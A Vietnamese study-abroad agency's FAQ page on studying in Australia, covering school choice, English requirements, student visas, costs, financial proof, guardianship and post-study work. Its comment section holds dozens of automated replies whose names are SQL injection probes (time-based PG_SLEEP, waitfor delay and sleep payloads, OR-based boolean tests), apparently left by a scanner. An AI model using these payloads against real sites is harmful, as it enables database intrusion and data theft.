Du học Úc

Giải đáp thắc mắc thường gặp du học Úc

 • Thứ Ba, 31 Tháng 03 2020 15:55
 • Lượt xem: 186.855

Megastudy đã nhận được rất nhiều câu hỏi liên quan đến việc học tập và chuẩn bị hồ sơ du học Úc. Trong bài viết sau, chúng tôi sẽ tổng hợp các vấn đề về du học Úc: chọn trường, chọn ngành, điều kiện nhập học, chứng minh tài chính, chi phí, việc làm, định cư… để phụ huynh và học sinh cùng tham khảo.

Trong loạt bài tổng hợp này, chúng tôi xin nêu tóm lược cách giải quyết những khó khăn mà học sinh Việt Nam thường gặp phải khi du học Úc. Các chủ đề được độc giả đặt câu hỏi nhiều nhất gồm: Chọn trường, chọn ngành phù hợp với khả năng, học lực và dễ kiếm việc làm? Không đủ điều kiện nhập học thì làm sao? Không thể chứng minh tài chính xin visa thế nào? Việc làm tại Úc có dễ dàng? Ở lại làm việc và định cư lộ trình ra sao,....sẽ lần lượt được giải đáp qua các kỳ.

1. Làm thế nào để chọn trường và ngành học phù hợp tại Úc?

Để có thể lựa chọn được ngành học và trường phù hợp, tiêu chí đầu tiên là sở trường, nguyện vọng và tính cách của mỗi cá nhân, tìm hiểu rõ ngành học và định hướng việc làm sau khi tốt nghiệp. Phụ huynh cũng nên đồng hành cùng con, tránh sự ép buộc, lựa chọn theo cảm tính, chọn theo truyền thống gia đình hay theo phong trào. Ví dụ một bạn không giỏi về tính toán rất khó theo học ngành kế toán, kỹ thuật, hay một bạn có khả năng giao tiếp tốt, năng động, tư duy sáng tạo thích học các ngành liên quan đến truyền thông, marketing hơn là các ngành về nghiên cứu…. Việc định hướng ngành hiện tại đã được chú trọng ngày càng sớm hơn ở các trường THPT hay các bên tuyển dụng kết hợp với các hoạt động như sinh trắc vân tay, test năng lực tư duy, trò chuyện trực tiếp với chuyên gia nhân sự.

Khi lựa chọn trường, bạn nên tìm hiểu

-Thế mạnh về ngành học bạn lựa chọn không

-Địa điểm và chi phí học tại trường.  

-Quy mô, chất lượng và định hướng đào tạo, các cơ sở tiện ích và dịch vụ hỗ trợ cho sinh viên du học.

-Nếu bạn mong muốn định cư tại Úc, việc lựa chọn ngành học ưu tiên và địa điểm học rất quan trọng. Nếu địa điểm học thuộc vùng xa xôi, ít dân cư, sẽ được cộng thêm điểm để xét cấp thẻ định cư.

>> Các ngành học HOT và khát nhân lực tại Úc

>> Danh sách các trường Đại học, Cao đẳng uy tín tại Úc

2. Nếu chưa có điểm tiếng Anh có thể nhập học không?

Các trường tại Úc xét hồ sơ để cấp thư mời cho sinh viên chứ không tổ chức thi tuyển. Dưới đây là các tiêu chí chung của các trường về điều kiện nhập học. Với từng trường và các bậc học cụ thể, sẽ có những điều chỉnh tương ứng. 

Học lực: Phần lớn Phần lớn các trường ở Úc đều yêu cầu học lực trung bình khá trở lên đối với tất cả các bậc học. Với những chuyên ngành đặc biệt, trường có yêu riêng với từng môn học liên quan như môn toán đối với ngành kỹ sư xây dựng, môn hóa đối với ngành dược… Với những trường hợp không đáp ứng đủ điều kiện học lực của trường, vẫn có thể đựợc nhận vào học theo diện có điều kiện. Ví dụ: Chứng minh đựợc sự tiến bộ trong quá trình học tập ở Việt Nam (điểm năm sau cao hơn năm trước), tăng điều kiện về khả năng tiếng Anh hoặc làm bài test bổ sung. 

Chứng chỉ tiếng Anh: Chấp nhận điểm IELTS, PTE, Toefl chính thức. Yêu cầu điểm từng kỹ năng tuỳ vào khoá học và trường sẽ khác nhau .Bạn nên đọc kỹ thông tin từ website chính thức của nhà trường để nắm rõ yêu cầu đầu vào cụ thể của từng khoá học.

+ THPT: Không yêu cầu bắt buộc phải có chứng chỉ tiếng anh quốc tế từ Việt Nam, học sinh được phân lớp học tiếng anh theo trình độ trước khi vào khoá học chính

+Bậc dự bị và cao đẳng: IELTS 5.0 – 5.5

+Bậc đại học: IELTS 6.0

+Thạc sỹ và tiến sỹ: IELST 6.5

Đa phần các trường có khoá tiếng anh cho sinh viên trước khi nhập học khoá học chính. Tuy nhiên thay vì có thể học tiếng anh tại Úc lên đến 1 năm như trước đây, bạn chỉ được cấp khoá học tiếng anh tối đa 20 – 30 tuần nếu muốn được cấp thư mời cho khoá Tiếng anh cùng khoá chính để xin visa theo gói và thời gian cấp visa cho toàn khoá học. Vì vậy, trình độ tiếng anh ban đầu của bạn khi đăng ký khoá học tại Úc cũng phải tương đương tối thiểu IELTS 4.5 trở lên (cho khoá dự bị, cao đẳng) và IELTS 5.0 trở lên (cho khoá đại học thạc sỹ).

Nắm được tâm lý ngại thi chứng chỉ, hoặc nhiều bạn học sinh cuối cấp chưa tập trung thi được chứng chỉ tiếng anh, các trường tạo điều kiện cho sinh viên làm bài test tiếng anh thay cho chứng chỉ IELTS đầu vào. Tuy nhiên nếu bạn có chứng chỉ tiếng anh chính thức thì hồ sơ xin visa của bạn sẽ thuyết phục hơn rất nhiều.

>> Học tiếng Anh để du học: các thắc mắc cần giải đáp

3. Tôi chưa hiểu rõ về visa du học và điều kiện xét duyệt visa du học Úc? Tôi có bắt buộc phải chứng minh nguồn gốc tài chính?

Hiện tại visa Úc được xét duyệt theo hệ thống SSVF (Student Visa Framework Australia – SSVF), tất cả các loại visa du học đều theo 1 subclass 500 (THPT, học khoá nghề, cao đẳng, đại học, thạc sỹ và tiến sỹ)

Với loại visa này sinh viên có thể:

-          Được cấp thị thực (visa) đi lại nhiều lần ra vào Úc lên đến 5 năm tuỳ theo độ dài khoá học

-          Được phép đi làm thêm 40 giờ/2 tuần

-          Được phép ở lại làm việc lên đến 4 năm sau tốt nghiệp tuỳ bậc học

-          Được phép đưa người phụ thuộc (vợ/chồng, con) đi cùng

Theo bảng mô tả dưới đây, việc xét hồ sơ tài chính khi xin visa du học Úc sẽ dựa trên Level của trường và của quốc gia. Việt Nam hiện tại vẫn được xét ở Level 2, nên khi bạn đăng ký vào các trường level 1 và 2 tại Úc đều không cần nộp hồ sơ chứng minh nguồn gốc tài chính khi xin xét duyệt visa.  Vậy làm sao để biết được level của các trường bạn đăng ký học, hãy kiểm tra thông tin tại website của bộ di trú hoặc liên hệ với các công ty tư vấn du học để có thông tin chính xác nhất. Dù không cần chứng minh nguồn gốc tài chính với lãnh sự, bạn vẫn cần trải qua sự xét duyệt của trường để được cấp thư mời.

Trường level 1, level 2 sinh viên không bắt buộc phải có chứng chỉ tiếng anh khi xin visa

Trường level 3: Chủ yếu áp dụng với các khóa cao đẳng, các khóa học nghề... Với bậc xét này, ngoài việc phải chứng minh nguồn gốc tài chính, sinh viên bắt buộc có chứng chỉ Ielts khi xin visa.

Trong trường hợp gặp khó khăn trong việc xét visa khi đăng ký các trường level 3 do không thể chứng minh nguồn gốc tài chính hoặc không đủ điều kiện tiếng Anh, sinh viên có thể thay đổi lộ trình học của mình để được thay đổi bậc xét visa. Việc thay đổi lộ trình tùy thuộc vào trường và khóa học mà sinh viên đăng ký. Để được tư vấn cụ thể, quý phụ huynh và các bạn học sinh, sinh viên có thể liên hệ Megastudy để được hướng dẫn.   

4. Học phí và chi phí sinh hoạt tại Úc bao nhiêu?

Học phí sẽ tuỳ thuộc và hình thức trường và các khoá học khác nhau, dưới đây là mức trung bình bạn có thể tham khảo

- THPT: 13,000 – 18,000 AUD/năm

- Cao đẳng nghề: 7,000 – 18,000 AUD/năm

- Đại học: 19,000 – 40,000 AUD/năm

- Thạc sỹ, tiến sỹ: 22,000 – 40,000 AUD/năm

Chi phí sinh hoạt:  21,041 AUD/năm cho 1 du học sinh. (Tuy nhiên nếu bạn học tại các thành phố regional như Adelaide, Perth, New Castle,…. Chi phí sẽ thấp hơn nhiều giảm đến 25% so với các thành phố lớn Melbourne, Sydney). Chi phí choVợ/chồng đi cùng thêm 7,362 AUD/năm, mỗi con đi cùng thêm 3.152 AUD/năm

Chi phí bảo hiểm: khoảng 500 AUD/năm cho Bảo hiểm cá nhân, và khoảng 3,000 AUD/năm cho bảo hiểm gia đình

Chi phí khác: vé máy bay, chi tiêu mua sắm cá nhân,…

5. Con tôi vừa tốt nghiệp lớp 11, tôi đang băn khoăn cho cháu học THPT hay dự bị đại học? Tôi chưa hiểu rõ lắm về các lộ trình học tập tại Úc?

Hệ thống giáo dục của Việt Nam và Úc có nhiều điểm tương đồng cũng như khác biệt. nếu bạn hiểu rõ lộ trình học tập sẽ dễ dàng chuẩn bị kế hoạch du học thành công

- THPT: Khi đăng ký học khoá THPT tại Úc, nhà trường sẽ xét học bạ các năm bạn đã hoàn thành ở Việt Nam và xét chuyển tín chỉ để cấp thư mời cho bạn cho các năm học với số tín chỉ chưa hoàn thành.

- Các lộ trình học cho Bậc Đại học và VET (học nghề)

Hoàn thành Lớp 11 + Dự bị ĐH (8 – 12m) + Năm 1 ĐH

Hoàn thành Lớp 12 + Diploma (8 -12m) – tương đương Năm 1 ĐH+ Năm 2 ĐH

Hoàn thành Lớp 12 + Năm 1 ĐH (direct): Lộ trình này nhiều trường ĐH uy tín chỉ nhận học sinh từ THPT chuyên hoặc có GPA cao

Hoàn thành Lớp 11 + Certificate + Diploma/Advance diploma + Chuyển tiếp vào ĐH: Phù hợp các bạn quan tâm đi nghề và không đảm bảo chuyển tiếp bằng thời gian thông thường

- Lộ trình cho Bậc sau đại học:

Tốt nghiệp Đại học + Master/MBA (2 năm)

Tốt nghiệp Thạc sỹ + Tiến sỹ ( 2- 3 năm)

Lưu ý sinh viên tốt nghiệp ĐH ở các ngành không liên quan hoặc từ các trường section 2 ở VN (tư, dân lập, liên kết,….) có thể được yêu cầu học khoá dự bị ( PQP/ Pre master) kéo dài 4 – 6 tháng tuỳ trường yêu cầu.

Để hiểu rõ mình phù hợp với lộ trình nào bạn cần hiểu rõ các chương trình học và so sánh điểm khác biệt hay thuận lợi của từng chương trình.

>> Du học Úc: Học Pathway- Lộ trình học tiết kiệm chi phí tại các trường Đại học danh tiếng


6. Tốt nghiệp từ THPT hệ giáo dục thường xuyên hoặc Đại học tại chức, chương trình liên thông tại Việt Nam có được chấp nhận học tại Úc không?

Bạn hoàn toàn có thể bởi vẫn có nhiều trường tại Úc chấp nhận học sinh sinh viên với bằng cấp như vậy ở Việt Nam. Quan điểm giáo dục mở của Úc tạo điều kiện hết sức cho sinh viên có cơ hội học tập tại đây, bạn có thể được yêu cầu học thêm một khoá dự bị hay chuyển đổi trước khi học khoá chính (nếu cần). Tuy nhiên, khi xin visa bạn hồ sơ học lực của bạn sẽ bị điểm yếu nên bạn cố gắng nâng điểm tiếng Anh tốt để ghi điểm cho hồ sơ visa của mình.

7. Tôi nhiều tuổi và tốt nghiệp lâu rồi có thể đi học tiếp được không?

Phần lớn các trường ở Úc đều không quy định độ tuổi đi học trừ một số trường hợp đặc biệt. Tuy nhiên, mức tuổi phổ biến được chấp nhận dễ dàng tại các trường ở Úc là:

  + Học bậc THPT : < 18 tuổi

  + Học bậc Dự bị : < 19 tuổi

  + Học các chương trình khác: < 45 tuổi

Nếu bạn quá cao tuổi và thời gian tốt nghiệp khoá học gần nhất quá xa thì sẽ khó khăn hơn khi xin visa du học. Bạn sẽ cần phải có những chứng minh hợp lý với đại sứ quán để tránh trường hợp bị nghi ngờ đi học với mục đích khác. Việc giải trình cần căn cứ theo hồ sơ cụ thể về lịch sử làm việc, học tập và kế hoạch sau khi tốt nghiêp của mình. 

8. Tôi đang học dở cao đẳng, đại học ở Việt Nam có chuyển tiếp sang Úc học được không? Nếu tôi muốn đổi ngành học thì có được chấp nhận?

Những sinh viên đang học đại học hoặc cao đẳng tại Việt Nam, muốn học chuyển tiếp sang Úc sẽ được xét bảng điểm và mức độ phù hợp giữa 2 chuyên ngành để giảm số tín chỉ và môn học. Đây thực sự là một thuận lợi lớn dành cho sinh viên Việt Nam khi có thể rút ngắn được thời gian học. Hơn thế nữa, trong khi số năm đại học trong nước là 4 năm thì ở Úc, du học sinh chỉ cần mất 3 năm để hoàn thành bằng cử nhân. 

Nếu sinh viên muốn đổi ngành học thì việc xét chuyển tiếp sẽ không còn tương đương và bạn cần học lại từ đầu. Bạn nên giải trình để thuyết phục lãnh sự vì sao mình muốn chuyển đổi ngành nghề khi xin visa.

 9. Tôi phải chuẩn bị các chi phí gì trước khi đi du học Úc?

Dưới đây là bảng dự trù chi phí để quý phụ huynh và học sinh cân đối khi quyết định du học Úc

Phí nộp cho trường

Mức phí

Học phí khoá tiếng anh

300 – 500 AUD/ tuần

Học phí Trường THPT

Trường công lập 13.500 – 18.000 AUD/năm

Trường tư  20.000 – 40.000 AUD/năm

Học phí trường cao đẳng, đại học

Tùy theo quy định của nhà trường, mức trung bình

Cao đẳng: 7.000 – 18.000 AUD/năm

Đại học: 19.000 – 40.000 AUD/năm

Phí ghi danh, đồng phục, công cụ dụng cụ học tập,…

Tùy theo quy định của nhà trường

Phí nộp cho đại sứ quán

Mức phí

Phí xét visa (đóng khi nộp hồ sơ, không hoàn lại)

620 AUD/ hồ sơ

Phí khám sức khỏe (nộp tại địa điểm khám)

              Khoảng 2.000.000 VND/ hồ sơ

Phí cá nhân

Mức phí

Phí bảo hiểm du học sinh OSHC (đóng cho cả quá trình học)

Bảo hiểm cá nhân khoảng 500 AUD/năm

Bảo hiểm gia đình 3,000 AUD/năm

Chi phí sinh hoạt

21.041 AUD/ năm

Vé Máy bay

 

Khoảng 600 – 1.000 AUD/vé


10. Nộp tiền học phí và bảo hiểm Y tế (OSHC)?

Với visa du học, người nộp đơn được yêu cầu đóng tiền học phí và bảo hiểm y tế (cho toàn bộ thời gian học) trước cho trường để nhận thư nhập học chính thức (eCOE) nộp cùng hồ sơ xin visa. Với gói khoá học bao gồm nhiều khoá học khác nhau (ví dụ như Tiếng anh + dự bị đại học + đại học), bạn cần đóng học phí đặt cọc cho tất cả các khoá học. Học phí được đóng làm nhiều lần, chi tiết như sau:

Lần 1: Ngay sau khi có thư mời học của trường và trước khi nộp hồ sơ xin visa. Chi phí cần đóng gồm có: Đặt cọc học phí (tùy theo quy định của từng trường, thông thường là 100% khóa học tiếng anh và học phí 1 học kỳ khóa học chính), phí bảo hiểm toàn khóa, phí ghi danh, phí tài liệu (nếu có). Tất cả chi phí cần đóng lần 1 được thể hiện rõ trong thư mời. Nếu trường hợp visa du học của bạn bị từ chối, các trường sẽ hoàn lại toàn bộ phí bạn đã đóng trừ phí xét hồ sơ (50 – 250 AUD)

Lần 2: Đóng theo kỳ học và đóng vào đầu các kỳ học

Như vậy, nếu một học sinh sang Úc học tiếng Anh, sau đó học đại học/cao học thì gần 1,5 năm sau gia đình mới phải tiếp tục đóng tiền học phí. 

11. Nếu gia đình tôi không có người quen ở Úc, khi con tôi sang ăn ở thế nào? Nếu con tôi chưa đủ 18 tuổi, tôi có được đi cùng con làm người bảo hộ không?

Các hình thức nhà ở phổ biến tại Úc

- Homestay (ở cùng người bản xứ)

- Ký túc xá: tuy nhiên không phải trường nào cũng có ký túc xá 

- Thuê nhà bên ngoài: Bạn có thể cùng 1 nhóm bạn cùng thuê và chia sẻ 1 ngôi nhà để tiết kiệm chi phí

- Ở cùng người thân

Về việc giám hộ, theo quy định của chính phủ Úc, học sinh dưới 18 tuổi phải có người giám hộ theo 2 cách

- Cách 1: Cha mẹ của học sinh sẽ sang Úc theo visa 590 làm người giám hộ cho con. Phụ huynh được phép ở lại Úc đến khi con tròn 18 tuổi, và trong thời gian đó, phụ huynh không được đi làm tại Úc. Để đạt được visa, gia đình sẽ phải chứng minh nguồn tài chính cho cả học sinh đi học và phụ huynh sang giám hộ.

- Cách 2: Người giám hộ là người có quốc tịch Úc, được chính phủ cấp phép bảo hộ học sinh quốc tế. Đây có thể là người thân trong gia đình hoặc không phải. Trường hợp gia đình không tự tìm được người bảo hộ, có thể đăng ký dịch vụ với trường, trường chỉ định người giám hộ.

12. Tôi sang Úc học, có được đưa vợ con sang cùng hay không? Tôi có phải chứng minh tài chính cho toàn bộ thời gian ở Úc không?

Khi du học tại Úc theo visa du học, bạn hoàn toàn có thể đưa vợ/chồng và con sang cùng. Bậc xét visa của cả gia đình theo bậc xét của người đi học (Studen visa 500). Có 3 vấn đề cần lưu ý khi xin visa cho người thân sang cùng như sau

Chứng minh tài chính: Ngoài việc chứng minh nguồn tài chính cho người đi học, phải chứng minh cho cả người đi cùng đủ học phí và sinh hoạt. Nếu người đi học tự chứng minh cần chứng minh cho toàn bộ thời gian học cho cả gia đình, nếu bố mẹ hay người khác bảo lãnh chỉ cần chứng minh cho 12 tháng đầu tiên, cụ thể như sau:

Học phí: Học phí 1 năm đầu khoá học của đương đơn Nếu có con đi kèm và đến tuổi đi học phải chứng minh thêm học phí cho mỗi con tối thiểu 8,296 AUD/năm

Chi phí sinh hoạt: Đương đơn 21,041 AUD/năm

                             Vợ/chồng đi cùng 7,362 AUD

                             Mỗi con đi cùng 3.152 AUD/năm

Bảo hiểm: thay vì mua bảo hiểm cá nhân, bạn cần mua bảo hiểm cho cả gia đình khoảng 4,000 AUD/năm

Giải trình hồ sơ xin visa: Việc giải trình hồ sơ hợp lý để chứng minh được nguyện vọng và lý do cả gia đình đi cùng nhau là vô cùng quan trọng để lãnh sự cấp visa. Vì khi đó sự ràng buộc của đương đơn quay trở về đã giảm, tuỳ vào hoàn cảnh của từng gia đình (trình độ học vấn, độ tuổi, số năm kết hôn, con cái, người thân, tình hình tài chính, công việc…) chuyên viên tư vấn của Megastudy sẽ đưa ra lời khuyên phù hợp giúp đương đơn có giải trình và các giấy tờ chứng minh tài chính thuyết phục nhất

Lưu ý: Nếu vợ/chồng đi cùng có đăng ký các khóa học, thì visa được xét theo bậc quy định của chương trình học đó, không phụ thuộc vào visa của người kia. 

13. Nếu vợ tôi đi cùng khi tôi du học Úc, chúng tôi có được đi làm thêm không?

Theo quy định của chính phủ Úc, du học sinh trên 18 tuổi được phép làm việc tối đa 40 tiếng/2 tuần trong thời gian học và 40 tiếng/tuần vào kỳ nghỉ. Vợ/chồng đi cùng sẽ được hưởng các quyền lợi và chính sách theo bậc visa của đương đơn chính.

Cơ hội làm việc cho sinh viên quốc tế khá phong phú với mức lương từ 14 – 25 AUD/giờ. Với mức lương này, bạn hoàn toàn có thể tự chi trả phí sinh hoạt trong thời gian học. Việc làm thêm không chỉ mang lại thu nhập mà còn tạo cơ hội để các bạn nâng cao khả năng tiếng Anh và học tập được kỷ luật lao động, văn hoá của người dân nơi đây.

14. Xin cho tôi biết cụ thể về yêu cầu chứng minh tài chính khi đi du học Úc?

Nhiều phụ huynh hiểu nhầm việc chứng minh tài chính là chỉ cần cung cấp 1 khoản tiền, hay tài khoản tiết kiệm là đủ. Tuy nhiên, với các trường hợp nhập học tại các trường level 3, được yêu cầu chứng minh tài chính khi nộp hồ sơ xin visa đến lãnh sự Úc, bạn cần cung cấp nguồn gốc phát sinh thu nhập của người bảo lãnh, cụ thể hồ sơ tài chính bao gồm

Sổ tiết kiệmsố tiền trong tài khoản tiết kiệm đủ số tiền chi trả học phí, sinh hoạt phí và các khoản phí liên quan (bảo hiểm, phí đi lại, phụ phí tài liệu học tập…) cho 1 năm học. Tuỳ vào trường học sẽ có mức phí khác nhau, thông thường số tiền sẽ dao động từ 700 triệu – hơn 1 tỷ VND/năm

- Nguồn thu nhập phát sinh hàng tháng của người bảo lãnh

Đây là vấn đề khó khăn nhất trong khi hoàn thành hồ sơ xin visa của du học sinh. Người bảo lãnh cần chứng mình thu nhập đủ để chứng minh cho du học sinh và còn chi trả cho việc nuôi gia đình, con cái ở Việt Nam. Theo quy định, người bảo lãnh cần có nguồn thu nhập 62,222 AUD/ năm, và nếu bảo lãnh cho du học sinh có đưa gia đình theo thì cần có nguồn thu nhập 72,592 AUD/năm. Lãnh sự chấp nhận nhiều nguồn bảo lãnh (ví dụ cả bố mẹ cùng bảo lãnh, hoặc bố mẹ cùng ông bà,…) nhưng ưu tiên là người thân ruột thịt có quan hệ gắn bó như bố mẹ, anh chị em,…sẽ thuyết phục hơn nhiều.

Hồ sơ cung cấp sẽ khác nhau phụ thuộc vào từng gia đình, thông thường phát sinh từ các nguồn: thu nhập từ lương, kinh doanh, cho thuê tài sản, lãi đầu tư, lãi tiết kiệm, từ cho biếu, thừa kế, mua bán…. Chuyên viên tư vấn sẽ phân tích và hướng dẫn cụ thể bởi thực tế ở Việt Nam, nhiều gia đình có tài chính khá tốt nhưng chưa biết cách chuẩn bị hồ sơ giấy tờ để chứng minh thu nhập của mình một cách hợp lý, hợp lệ và thuyết phục.

- Tài sản: bất động sản, ô tô,.. là các tài sản thể hiện điểm mạnh của hồ sơ

- Hồ sơ vay tín dụng du học từ ngân hàng: Trường hợp sinh viên khó khăn và không thể cung cấp hồ sơ tài chính có thể sử dụng hình thức vay tín dụng và bảo lãnh từ ngân hàng

15. Tôi đã nộp hồ sơ visa được 4 tuần nhưng chưa thấy có phản hồi gì? Thời gian xét visa là bao nhiêu lâu? Nếu tôi đã từng bị trượt visa, thì có thể xin lại được hay không? 

Thời gian xét visa của lãnh sự Úc từ vài ngày đến 3 tháng tuỳ vào loại visa và mức độ phức tạp của hồ sơ. Trong thời gian xét duyệt, lãnh sự có thể gọi điện phỏng vấn du học sinh hoặc các bên liên quan để kiểm tra tính xác thực của hồ sơ. Do đó nếu bạn mong muốn hồ sơ của mình được xét duyệt nhanh hãy cung cấp thông tin một cách đầy đủ và chính xác, du học sinh cũng cần nắm vứng thông tin hồ sơ để trả lời tốt khi phỏng vấn.

Với trường hợp đã từng bị từ chối visa, việc xin lại lần 2 là hoàn toàn có thể. Dựa vào lý do trong thư từ chối của lãnh sự lần 1, bạn nên thay đổi hồ sơ theo chiều hướng thay đổi tích cực hơn và giải trình thêm hợp lý.

>> Nguyên nhân trượt visa Úc và bí quyết khắc phục

16. Nếu không có người thân bảo lãnh, tôi có thể xin định cư tại Úc hay không? Học tại những vùng nào thì tôi sẽ được chính quyền bang bảo lãnh để xin định cư?

Có nhiều cách khác để xin định cư tại Úc như: kết hôn, bảo lãnh người thân, di dân…Tuy nhiên trong khuôn khổ bài viết này, chương trình sẽ chỉ giải đáp những vấn đề về định cư diện tay nghề, cho phép sinh viên nước ngoài đã hoàn thành khóa học của mình có thể đăng ký làm thẻ định cư theo quy định của chính phủ Úc.

Bảng tính điểm định cư được xét với nhiều tiêu chí khác nhau như: tuổi, trình độ tiếng Anh, kinh nghiệm làm việc, thời gian học tập tại Úc, địa điểm học, bảo lãnh…Đặc biệt nếu học tập tại các vùng Regional sẽ được cộng thêm điểm.

>> Du học Úc tại vùng Regional – cơ hội định cư cao hơn hẳn Sydney và Melbourne

17. Sau khi hoàn thành khoá học, tôi có thể được gia hạn visa không? Trong thời gian đó, tôi có được đi làm không?

Với các bạn sinh viên học khóa cử nhân, thạc sỹ và tiến sỹ tại Úc, sau khi học xong sẽ được xét cấp visa tạm trú tại Úc là Post – StudyWork Visa. Loại visa mới này cho phép du học sinh được ở lại Úc làm viêc. Cụ thể: Với du học sinh tốt nghiệp cử nhân hoặc thạc sỹ được gia hạn 2 năm và 3 năm cho sinh viên học tại các vùng regional, thạc sỹ nghiên cứu là 3 năm và tiến sỹ là 4 năm.

Điều kiện để được xin Post – StudyWork Visa hiện đã dễ dàng hơn:

- Trong vòng 6 tháng trước khi đăng ký làm visa, sinh viên phải hoàn thành và có bằng cử nhân, thạc sỹ hoặc tiến sỹ tại Úc.

- Sinh viên phải hoàn thành khóa học được đăng ký bởi Commonwealth Register of Institutes and Courses for Overseas Students (CRICOS) có độ dài 2 năm trở lên (khóa cao đẳng, cử nhân và thạc sỹ, tiến sỹ của các trường đại học có độ dài 2 năm trở lên).

- Sinh viên phải đảm bảo điều kiện sức khỏe và có lý lịch tư pháp tốt. 

- Mua bảo hiểm có thời hạn tương đương với thời gian visa tạm trú được cấp. 

- Sinh viên không cần thỏa mãn yêu cầu bằng cấp thuộc trong danh sách các nghề nghiệp được ưu tiên của Úc (Skilled Occupation List – SOL).

18. Tôi rất lo khi con tôi mới sang Úc lần đầu, nhà trường có hỗ trợ và hướng dẫn sinh viên không?

Trung tâm dịch vụ sinh viên quốc tế của trường sẽ thực hiện chu đáo việc đón học sinh tại sân bay, tìm nhà cho học sinh, đưa học sinh tới chỗ ở, hướng dẫn chi tiết đi lại, thủ tục cần thiết để đăng ký tài khoản ngân hàng… Trong trường hợp đặc biệt không thể sử dụng dịch vụ của trường Megastudy sẽ hỗ trợ sắp xếp chu đáo cho sinh viên trước khi bay với các gói dịch vụ hỗ trợ hoà nhập, tìm nhà ở, tìm việc làm thêm,…tại Úc

19. Tôi muốn tìm hiểu thông tin về du học cũng như đất nước, văn hoá tại Úc? Tôi có thể tim hiểu từ đâu?

Về thông tin du học Úc, bạn có thể tham khảo các nguồn

-  Các website chính thức của chính phủ và bộ di trú

Thông tin về visa: https://www.homeaffairs.gov.au/

Thông tin về học tập và đất nước: https://www.studyinaustralia.gov.au/

Học bổng chính phủ Úc: http://australiaawardsvietnam.org/

- Từ các mạng xã hội, nhóm du học sinh

- Từ người thân, bạn bè

- Từ các công ty tư vấn du học Uy tín

Chúc bạn hiểu đúng, đủ và lựa chọn chính xác để du học thành công!

>> Trượt visa du học, không đủ điểu kiện du học, bạn nên làm gì?  

>> Du học Úc: Những thành phố có cơ hội việc làm và định cư cao

>> Các ngành học được phép định cư tại Úc  

Hãy LIÊN HỆ MEGASTUDY và nhanh tay đăng ký để được tư vấn chi tiết và nhận nhiều ưu đãi.

CÔNG TY CỔ PHẦN DU HỌC VÀ ĐÀO TẠO QUỐC TẾ MEGASTUDY 

Hotline: 0904 683 036

Bình luận: Giải đáp thắc mắc thường gặp du học Úc

 • Nguyễn Thị Phương Anh: Chào quý Công ty ạ, em dự định sang Úc du học và em muốn đi cùng người yêu (chưa kết hôn) thì có thể có khả năng thành công không ạ. Mong nhận được phản hồi từ quý Công ty
  Vào lúc: 06/10/2022, 02:16:37 - Trả lời

  1????%2527%2522: e
  Vào lúc: 10/10/2023, 03:16:54
  @@X6bvY: e
  Vào lúc: 10/10/2023, 03:16:54
  1'": e
  Vào lúc: 10/10/2023, 03:16:53
  e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||': e
  Vào lúc: 10/10/2023, 03:16:50
  oAOBr5rl')) OR 687=(SELECT 687 FROM PG_SLEEP(15))--: e
  Vào lúc: 10/10/2023, 03:16:12
  zaqJeJf1') OR 836=(SELECT 836 FROM PG_SLEEP(15))--: e
  Vào lúc: 10/10/2023, 03:15:39
  Q9MsGXUY' OR 313=(SELECT 313 FROM PG_SLEEP(15))--: e
  Vào lúc: 10/10/2023, 03:14:28
  mBl7YW0U'; waitfor delay '0:0:15' --: e
  Vào lúc: 10/10/2023, 03:13:54
  1 waitfor delay '0:0:15' --: e
  Vào lúc: 10/10/2023, 03:13:08
  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/: e
  Vào lúc: 10/10/2023, 03:12:30
  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z: e
  Vào lúc: 10/10/2023, 03:11:46
  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z: e
  Vào lúc: 10/10/2023, 03:11:17
  if(now()=sysdate(),sleep(15),0): e
  Vào lúc: 10/10/2023, 03:10:21
  -1' OR 2+744-744-1=0+0+0+1 or '7NeUG8xy'=': e
  Vào lúc: 10/10/2023, 03:09:21
  -1" OR 2+335-335-1=0+0+0+1 --: e
  Vào lúc: 10/10/2023, 03:09:21
  -1' OR 2+190-190-1=0+0+0+1 --: e
  Vào lúc: 10/10/2023, 03:09:20
  -1 OR 2+44-44-1=0+0+0+1: e
  Vào lúc: 10/10/2023, 03:09:18
  -1 OR 2+600-600-1=0+0+0+1 --: e
  Vào lúc: 10/10/2023, 03:09:17
  yF3mKKmp: e
  Vào lúc: 10/10/2023, 03:09:16
  e: e
  Vào lúc: 10/10/2023, 03:08:36
  e: e
  Vào lúc: 10/10/2023, 03:07:35
  e: e
  Vào lúc: 10/10/2023, 03:06:36
  e: e
  Vào lúc: 10/10/2023, 03:05:14
  e: e
  Vào lúc: 10/10/2023, 02:52:10
  e: e
  Vào lúc: 10/10/2023, 02:52:08
  e: e
  Vào lúc: 10/10/2023, 02:52:05
  e: e
  Vào lúc: 10/10/2023, 02:52:03
  e: e
  Vào lúc: 10/10/2023, 02:51:02
  e: e
  Vào lúc: 10/10/2023, 02:50:29
  e: e
  Vào lúc: 10/10/2023, 02:49:52
  e: e
  Vào lúc: 10/10/2023, 02:49:50
  e: e
  Vào lúc: 10/10/2023, 02:49:47
  e: e
  Vào lúc: 10/10/2023, 02:49:47
  e: e
  Vào lúc: 10/10/2023, 02:48:54
  e: e
  Vào lúc: 10/10/2023, 02:47:35
  e: e
  Vào lúc: 10/10/2023, 02:45:59
  e: e
  Vào lúc: 10/10/2023, 02:45:22
  e: e
  Vào lúc: 10/10/2023, 02:44:23
  e: e
  Vào lúc: 10/10/2023, 02:43:33
  e: e
  Vào lúc: 10/10/2023, 02:42:38
  e: e
  Vào lúc: 10/10/2023, 02:42:06
  e: e
  Vào lúc: 10/10/2023, 02:41:28
  e: e
  Vào lúc: 10/10/2023, 02:40:57
  e: e
  Vào lúc: 10/10/2023, 02:40:24
  e: e
  Vào lúc: 10/10/2023, 02:39:51
  e: e
  Vào lúc: 10/10/2023, 02:39:03
  e: e
  Vào lúc: 10/10/2023, 02:38:15
  e: e
  Vào lúc: 10/10/2023, 02:37:30
  e: e
  Vào lúc: 10/10/2023, 02:36:44
  e: e
  Vào lúc: 10/10/2023, 02:36:42
  e: e
  Vào lúc: 10/10/2023, 02:36:41
  e: e
  Vào lúc: 10/10/2023, 02:36:40
  e: e
  Vào lúc: 10/10/2023, 02:36:37
  e: e
  Vào lúc: 10/10/2023, 02:36:37
  e: e
